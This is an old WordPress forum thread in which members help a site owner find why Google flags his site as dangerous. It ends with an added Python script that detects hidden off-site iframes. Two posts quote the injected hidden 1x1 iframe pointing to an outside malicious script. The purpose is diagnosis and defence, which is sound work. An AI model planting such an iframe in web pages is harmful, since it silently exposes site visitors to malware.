Virus within wp (16 posts)

  1. Wukung
    Member
    Posted 8 years ago #

    Hi!

    Google.de has indicated that my site (cjd-update.info) would be dangerous for visitors. Unfortunately it is quite right. A friend found out that "something" tries to activate Java applications on his IE and Vista. I myself use Apple and get no warnings. I guess the evil comes from a plugin. But how can I find out from which one? For the time being the site is put in maintenance mode. Any help would be great.

    Thank you

  2. whooami
    Member
    Posted 8 years ago #

    you look at the files ..

    your site isn't even cached in google, so i can't even look at the cached site, and you just said it's in maintenance mode.

    what else can you do?

  3. whooami
    Member
    Posted 8 years ago #

    http://web.archive.org/web/20070517185830/http://www.onlzoberurff.info/

    you have a script running that's picking up IPs and operating systems. depending on what sort of javascript is being used, that may very well be what's causing it.

    nobody really needs to know that anyway, do they? I already know what my ip and os is -- i don't need you to tell me.

  4. Wukung
    Member
    Posted 8 years ago #

    sorry, NOW the site is available: http://cjd-update.info

    Here the entry at google.de:

    http://www.google.de/search?q=cjd-update&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a

    I am looking for an idea of how to find the evil source...

  5. whooami
    Member
    Posted 8 years ago #

    I saw the entry on google.com, thanks. In English. Had I not, I wouldn't have been able to tell you that google isn't caching your site.

    SOMETHING on your site is contacting or attempting to contact localhost -- which for your readers is THEIR box. I brought up your site from a shell using lynx and saw it quite clearly.

  6. whooami
    Member
    Posted 8 years ago #

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    there's your problem. actually, that's not the problem, but it's your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

  7. Wukung
    Member
    Posted 8 years ago #

    Now I have changed the only file I know of where "localhost" matters. I deleted define('ENABLE_CACHE', true); from wp-config.php. Do you have an idea what that SOMETHING could be?

    Thank you!!

  8. whooami
    Member
    Posted 8 years ago #

    my last reply was caught by the forum as spam -

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    there's your problem. actually, that's not the problem, but it's your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

  9. Wukung
    Member
    Posted 8 years ago #

    It seems the plugin SHARE THIS was the foul source. Could you please be so kind and check with your shell? THANKS

  10. Chris_K
    Member
    Posted 8 years ago #

    see Whooami's last 2 replies (they were caught in moderation, I just released them)

  11. whooami
    Member
    Posted 8 years ago #

    i looked - it might have been inside that plugin .. dunno. I really doubt that Alex King is letting people download plugins with exploits in the code. Isn't that his plugin?

  12. drmiketemp
    Member
    Posted 8 years ago #

    I just downloaded the Share This plugin from Alex's site and don't see any iframe in there.

  13. whooami
    Member
    Posted 8 years ago #

    yeah i looked too, didn't see it .. in this guy's page source, the iframe was immediately before the closing body tag and after the last <!-- Share This END -->

  14. Wukung
    Member
    Posted 8 years ago #

    I checked the permissions. But they are ok (755). Nevertheless, thank you for the idea. It seems to be settled...

  15. IcelandDream
    Member
    Posted 8 years ago #

    You have a mystery iframe just below:
    "Der Weg nach Oberurff"
    and above "Links".
    Something in that map thing. I used wget to grab the source and there it is. Using lynx I too saw that reference to localhost.

  16. Wukung
    Member
    Posted 8 years ago #

    Thank you very much. I will delete that link at once. Besides your hint I was already thinking that could be the troublemaker. THANKS!
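
An added example, not part of the original thread: a Python check for the kind of hidden 1x1 off-site iframe whooami found near the closing body tag. The host names, the sample HTML and the names IframeAuditor and audit_html are constructed for illustration.

```python
# Added example (not from the thread): flag hidden or off-site iframes in page source.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page; host names are placeholders, not the thread's site.
SAMPLE = """<html><body>
<iframe src="http://blog.example/map.html" width="400" height="300"></iframe>
<!-- Share This END -->
<iframe src="http://injected.example/se.php?id=0" width=1 height=1></iframe>
</body></html>"""


class IframeAuditor(HTMLParser):
    """Collect iframes that are tiny, hidden by style, or loaded from another host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site src")
        for dim in ("width", "height"):
            value = a.get(dim, "").strip().lower()
            value = value[:-2] if value.endswith("px") else value
            if value.isdigit() and int(value) <= 2:
                reasons.append(f"{dim}={value}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((self.getpos()[0], a.get("src", ""), reasons))


def audit_html(html, site_host):
    """Return findings for one page; site_host is the site's own host name."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for line, src, reasons in audit_html(SAMPLE, "blog.example"):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

Run it over page source fetched from outside the site (for example with wget, as in the thread) rather than over the plugin files alone, since the injected tag may only appear in the rendered output.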
